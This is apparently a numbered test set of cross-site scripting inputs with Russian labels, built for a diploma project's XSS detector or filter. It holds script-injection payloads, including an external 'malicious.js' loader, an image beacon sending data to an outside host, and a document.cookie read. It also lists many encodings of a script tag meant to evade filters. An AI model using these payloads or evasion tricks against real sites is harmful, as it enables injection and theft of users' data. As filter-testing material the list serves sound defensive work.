1.Безопасный_Параметр:testextension&name=oleg&work=diplom
2.Первое_Регулярное_Выражение:<script>var i = 1;var j = 2;console.log(i+j);</script
3.Первое_Регулярное_Выражение:<script src='https://olegulanov/malicious.js'></script
4.Второе_Регулярное_Выражение:<img id='123' onerror="console.log('test')"
5.Третье_Регулярное_Выражение:<img id='123' src="http://badpicture/hacked.jpg">
6.Четвертое_Регулярное_Выражение:document.getElementById('main_text').innerHtml="Hi from Oleg";
7.Пятое_Регулярное_Выражение:javascript:console.log('XSS')
8.Шестое_Регулярное_Выражение:console.log(document.cookie)
9.Седьмое_Регулярное_Выражение:alert('XSS')
10.Восьмое_Регулярное_Выражение:var i = new Image(); i.src="http://olegulanov/?"+hello
11.Полное_URL-кодирование:%3c%73%63%72%69%70%74%3e%3c%2f%73%63%72%69%70%74%3e
12.Двойное_URL-кодирование:%253c%2573%2563%2572%2569%2570%2574%253e%253c%252f%2573%2563%2572%2569%2570%2574%253e
13.HTML_десятичное_кодирование_сущностей:&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
14.HTML_двойное_десятичное_кодирование_сущностей:&#38;&#35;&#54;&#48;&#59;&#38;&#35;&#49;&#49;&#53;&#59;&#38;&#35;&#57;&#57;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#48;&#53;&#59;&#38;&#35;&#49;&#49;&#50;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#54;&#50;&#59;&#38;&#35;&#54;&#48;&#59;&#38;&#35;&#52;&#55;&#59;&#38;&#35;&#49;&#49;&#53;&#59;&#38;&#35;&#57;&#57;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#48;&#53;&#59;&#38;&#35;&#49;&#49;&#50;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#54;&#50;&#59;
15.HTML_шестнадцатеричное_кодирование_сущностей:&#x3c&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
16.HTML_двойное_шестнадцатеричное_кодирование_сущностей:&#x26;&#x23;&#x78;&#x33;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x65;&#x3b;
17.HTML_именованное_кодирование_сущностей:&lt;script&gt;&lt;/script&gt;
18.UTF-8_HEX_кодирование:\x3c\x73\x63\x72\x69\x70\x74\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
19.UTF-8_двойное_HEX_кодирование:\x26\x23\x78\x33\x63\x3b\x26\x23\x78\x37\x33\x3b\x26\x23\x78\x36\x33\x3b\x26\x23\x78\x37\x32\x3b\x26\x23\x78\x36\x39\x3b\x26\x23\x78\x37\x30\x3b\x26\x23\x78\x37\x34\x3b\x26\x23\x78\x33\x65\x3b\x26\x23\x78\x33\x63\x3b\x26\x23\x78\x32\x66\x3b\x26\x23\x78\x37\x33\x3b\x26\x23\x78\x36\x33\x3b\x26\x23\x78\x37\x32\x3b\x26\x23\x78\x36\x39\x3b\x26\x23\x78\x37\x30\x3b\x26\x23\x78\x37\x34\x3b\x26\x23\x78\x33\x65\x3b
20.UTF-8_4digit_кодирование:\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
21.UTF-8_двойное_4digit_кодирование:\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030\u0037\u0033\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0036\u0039\u005c\u0075\u0030\u0030\u0037\u0030\u005c\u0075\u0030\u0030\u0037\u0034\u005c\u0075\u0030\u0030\u0033\u0065\u005c\u0075\u0030\u0030\u0033\u0063\u005c\u0075\u0030\u0030\u0032\u0066\u005c\u0075\u0030\u0030\u0037\u0033\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0036\u0039\u005c\u0075\u0030\u0030\u0037\u0030\u005c\u0075\u0030\u0030\u0037\u0034\u005c\u0075\u0030\u0030\u0033\u0065
22.UTF-8_с_кодовой_точкой:\u{3c}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}\u{3c}\u{2f}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}
23.UTF-8_двойное_кодирование_с_кодовой_точкой:\u{5c}\u{75}\u{30}\u{30}\u{33}\u{63}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{33}\u{5c}\u{75}\u{30}\u{30}\u{36}\u{33}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{32}\u{5c}\u{75}\u{30}\u{30}\u{36}\u{39}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{30}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{34}\u{5c}\u{75}\u{30}\u{30}\u{33}\u{65}\u{5c}\u{75}\u{30}\u{30}\u{33}\u{63}\u{5c}\u{75}\u{30}\u{30}\u{32}\u{66}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{33}\u{5c}\u{75}\u{30}\u{30}\u{36}\u{33}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{32}\u{5c}\u{75}\u{30}\u{30}\u{36}\u{39}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{30}\u{5c}\u{75}\u{30}\u{30}\u{37}\u{34}\u{5c}\u{75}\u{30}\u{30}\u{33}\u{65}
24.Функция_JavaScript_fromCharCode:String.fromCharCode(60,115,99,114,105,112,116,62,60,47,115,99,114,105,112,116,62)
25.Функция_JavaScript_fromCodePoint:String.fromCodePoint(60,115,99,114,105,112,116,62,60,47,115,99,114,105,112,116,62)
26.CSS_escapes:<style=\00003c \000073 \000063 \72 \69 \70 \74 \3e \3c \2f \73 \63 \72 \69 \70 \74 \3e
27.CSS_двойные_escape-последовательности:<style=\000026 \000023 \000078\0033 \63 \3b \26 \23 \78 \37 \33 \3b \26 \23 \78 \36 \33 \3b \26 \23 \78 \37 \32 \3b \26 \23 \78 \36 \39 \3b \26 \23 \78 \37 \30 \3b \26 \23 \78 \37 \34 \3b \26 \23 \78 \33 \65 \3b \26 \23 \78 \33 \63 \3b \26 \23 \78 \32 \66 \3b \26 \23 \78 \37 \33 \3b \26 \23 \78 \36 \33 \3b \26 \23 \78 \37 \32 \3b \26 \23 \78 \36 \39 \3b \26 \23 \78 \37 \30 \3b \26 \23 \78 \37 \34 \3b \26 \23 \78 \33 \65 \3b
28.Base64_подстрока_без_отступа:base64,PHNjcmlwdD48L3NjcmlwdD4">
29.Base64_подстрока_с_отступом:base64,PHNjcmlwdD48L3NjcmlwdD4=">
30.Base64_двойное_кодирование:base64,UEhOamNtbHdkRDQ4TDNOamNtbHdkRDQ>
31.Base64URL:PHNjcmlwdD4rPC9zY3JpcHQ-
32Base64URL_двойное_кодирование:UEhOamNtbHdkRDRyUEM5elkzSnBjSFEt
33.UTF-8_символ_с_полной_шириной:\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
34.Нулевые_байты_в_строке:<sc&#0;r\0i%00pt></script>
35.Все_методы_обфускации_кроме_Base64_Base64URL:%3c%00&#115;&#\0x63;\x72\69\u0070\u{74}&gt;String.fromCharCode(60,47,115,99)String.fromCodePoint(114,105,112,116,62)
36.Строка_35_в_Base64_дважды_с_отступом_и_без_отступа:SlROakpUQXdKaU14TVRVN0ppTmNNSGcyTXp0Y2VEY3lYRFk1WEhVd01EY3dYSFY3TnpSOUptZDBPMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvTmpBc05EY3NNVEUxTERrNUtWTjBjbWx1Wnk1bWNtOXRRMjlrWlZCdmFXNTBLREV4TkN3eE1EVXNNVEV5TERFeE5pdzJNaWs9